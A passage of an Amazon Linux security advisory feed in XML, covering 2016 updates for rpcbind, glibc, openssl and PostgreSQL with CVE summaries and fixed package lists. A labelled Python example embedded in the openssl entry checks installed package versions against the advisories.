arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.30-1.57.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-659</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-659: medium priority package update for rpcbind</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7236:
A use-after-free flaw related to the PMAP_CALLIT operation and TCP/UDP connections was discovered in rpcbind. A remote, unauthenticated attacker could possibly exploit this flaw to crash the rpcbind service (denial of service) by performing a series of UDP and TCP calls.
1264345:
CVE-2015-7236 rpcbind: Use-after-free vulnerability in PMAP_CALLIT
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7236" title="" id="CVE-2015-7236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpcbind-debuginfo" version="0.2.0" release="11.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-debuginfo-0.2.0-11.8.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="11.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-0.2.0-11.8.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="11.8.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-0.2.0-11.8.amzn1.i686.rpm</filename></package><package name="rpcbind-debuginfo" version="0.2.0" release="11.8.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-debuginfo-0.2.0-11.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-660</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-660: low priority package update for glibc</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5229:
It was discovered that the calloc implementation in glibc could return memory areas which contain non-zero bytes. This could result in unexpected application behavior such as hangs or crashes.
1256285:
CVE-2015-5229 glibc: calloc may return non-zero memory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5229" title="" id="CVE-2015-5229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.167.amzn1.i686.rpm</filename></package><package 
name="glibc-debuginfo-common" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.167.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.167.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-661</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-661: important priority package update for openssl</title><issued date="2016-03-10 16:30:00" /><updated date="2016-04-28 14:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2842:
The doapr_outch function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not verify that a certain memory allocation succeeds, which allows remote attackers to cause a denial of service (out-of-bounds write or memory consumption) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-0799.
1314757:
CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds
CVE-2016-0800:
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker could potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
1310593:
CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)
CVE-2016-0799:
The fmtstr function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g improperly calculates string lengths, which allows remote attackers to cause a denial of service (overflow and out-of-bounds read) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-2842.
1312219:
CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions
CVE-2016-0797:
An integer overflow flaw, leading to a NULL pointer dereference or a heap-based memory corruption, was found in the way some BIGNUM functions of OpenSSL were implemented. Applications that use these functions with large untrusted input could crash or, potentially, execute arbitrary code.
1311880:
CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption
CVE-2016-0705:
A double-free flaw was found in the way OpenSSL parsed certain malformed DSA (Digital Signature Algorithm) private keys. An attacker could create specially crafted DSA private keys that, when processed by an application compiled against OpenSSL, could cause the application to crash.
1310596:
CVE-2016-0705 OpenSSL: Double-free in DSA code
CVE-2016-0702:
A side-channel attack was found that makes use of cache-bank conflicts on the Intel Sandy-Bridge microarchitecture. An attacker who has the ability to control code in a thread running on the same hyper-threaded core as the victim&#039;s thread that is performing decryption, could use this flaw to recover RSA private keys.
1310599:
CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcript Collision attacks against MD5 in key exchange protocol (SLOTH)
CVE-2015-3197:
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that were disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
1301846:
CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers
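Added example, not part of the Amazon Linux advisory feed or of yum: the check a practitioner scripts against a file in this format, i.e. read each security update's package list and decide whether an installed epoch:version-release is older than the fixed build. The version ordering is a hand-written approximation of rpm's segment-by-segment comparison (numeric segments beat alphabetic ones, a tilde sorts lowest, the epoch outranks everything); on a real host prefer rpm's own labelCompare. The updateinfo sample is constructed inline in the shape of the records here (openssl at epoch 1, bind at epoch 32) and the installed versions are made up.

```python
"""Added example: check installed packages against updateinfo.xml records.
Not Amazon's or yum's tooling.  Assumes the record layout seen in this file
(update / pkglist / collection / package with name, epoch, version, release,
arch) and rpm's ordering rules: epoch first, then version, then release."""
import re
import xml.etree.ElementTree as ET

# rpm splits versions on non-alphanumerics; "~" is kept because it sorts lowest.
_SEG = re.compile(r"[0-9]+|[a-zA-Z]+|~")


def rpmvercmp(a, b):
    """Compare two version or release strings the way rpm does.
    Returns 1 if a is newer, -1 if b is newer, 0 if they are equal."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x == "~" or y == "~":            # tilde is older than anything else
            if x != y:
                return -1 if x == "~" else 1
            continue
        if x.isdigit() and y.isdigit():
            nx, ny = int(x), int(y)         # numeric compare, so 89 beats 9
            if nx != ny:
                return 1 if nx > ny else -1
        elif x.isdigit() != y.isdigit():   # a numeric segment beats an alphabetic one
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    # Leftover segments: a trailing "~" makes the longer string older, anything else newer.
    longer = sa if len(sa) > len(sb) else sb
    rest_is_tilde = longer[min(len(sa), len(sb))] == "~"
    if len(sa) > len(sb):
        return -1 if rest_is_tilde else 1
    return 1 if rest_is_tilde else -1


def evr_cmp(a, b):
    """Compare (epoch, version, release) tuples: an epoch bump (mod_ssl at 1,
    bind at 32 in this feed) outranks any version or release difference."""
    if int(a[0]) != int(b[0]):
        return 1 if int(a[0]) > int(b[0]) else -1
    r = rpmvercmp(a[1], b[1])
    return r if r != 0 else rpmvercmp(a[2], b[2])


def fixed_packages(xml_text):
    """Map (name, arch) to the list of (advisory id, fixed evr, cve ids) taken
    from every type="security" update in an updateinfo.xml document."""
    out = {}
    for upd in ET.fromstring(xml_text).iter("update"):
        if upd.get("type") != "security":
            continue
        adv = upd.findtext("id")
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        for pkg in upd.iter("package"):
            key = (pkg.get("name"), pkg.get("arch"))
            evr = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
            out.setdefault(key, []).append((adv, evr, cves))
    return out


def missing_fixes(installed, fixes):
    """installed: {(name, arch): (epoch, version, release)} as rpm -q reports.
    Returns (advisory, package, cves) for every fix newer than what is installed."""
    gaps = []
    for key, evr in installed.items():
        for adv, fixed_evr, cves in fixes.get(key, []):
            if evr_cmp(evr, fixed_evr) == -1:
                gaps.append((adv, key[0], cves))
    return gaps


def sample_updateinfo():
    """Constructed sample (not copied from the feed) in the shape of the records above."""
    root = ET.Element("updates")

    def add(adv, cve, pkgs):
        u = ET.SubElement(root, "update", type="security", status="final")
        ET.SubElement(u, "id").text = adv
        ET.SubElement(ET.SubElement(u, "references"), "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(u, "pkglist"), "collection", short="amazon-linux-ami")
        for name, epoch, ver, rel, arch in pkgs:
            ET.SubElement(coll, "package", name=name, epoch=epoch, version=ver, release=rel, arch=arch)

    add("ALAS-2016-661", "CVE-2016-0800", [("openssl", "1", "1.0.1k", "14.89.amzn1", "x86_64")])
    add("ALAS-2016-665", "CVE-2016-1285", [("bind", "32", "9.8.2", "0.37.rc1.45.amzn1", "x86_64")])
    return ET.tostring(root, encoding="unicode")


def demo():
    """Made-up installed set: openssl one release behind the fix, bind already fixed."""
    installed = {
        ("openssl", "x86_64"): ("1", "1.0.1k", "14.88.amzn1"),
        ("bind", "x86_64"): ("32", "9.8.2", "0.37.rc1.45.amzn1"),
    }
    return missing_fixes(installed, fixed_packages(sample_updateinfo()))


if __name__ == "__main__":
    for adv, name, cves in demo():
        print(adv, name, ", ".join(cves))
```

Only the openssl gap is reported: bind is already at the fixed build, and the epoch comparison is what keeps a host carrying a lower-epoch package from being reported as current when a release string alone would sort higher.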
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3197" title="" id="CVE-2015-3197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0702" title="" id="CVE-2016-0702" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0705" title="" id="CVE-2016-0705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0797" title="" id="CVE-2016-0797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0799" title="" id="CVE-2016-0799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0800" title="" id="CVE-2016-0800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2842" title="" id="CVE-2016-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" 
release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-14.89.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-662</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-662: important priority package update for postgresql94 postgresql93 postgresql92</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0773:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the PostgreSQL handling code for regular expressions. A remote attacker could use a specially crafted regular expression to cause PostgreSQL to crash or possibly execute arbitrary code.
1303832:
CVE-2016-0773 postgresql: case insensitive range handling integer overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0773" title="" id="CVE-2016-0773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-test" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.11" release="1.61.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.11" release="1.61.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" 
version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.15" release="1.57.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql92-docs-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.6" release="1.66.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.6" 
release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.6-1.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-663</id><title>Amazon Linux 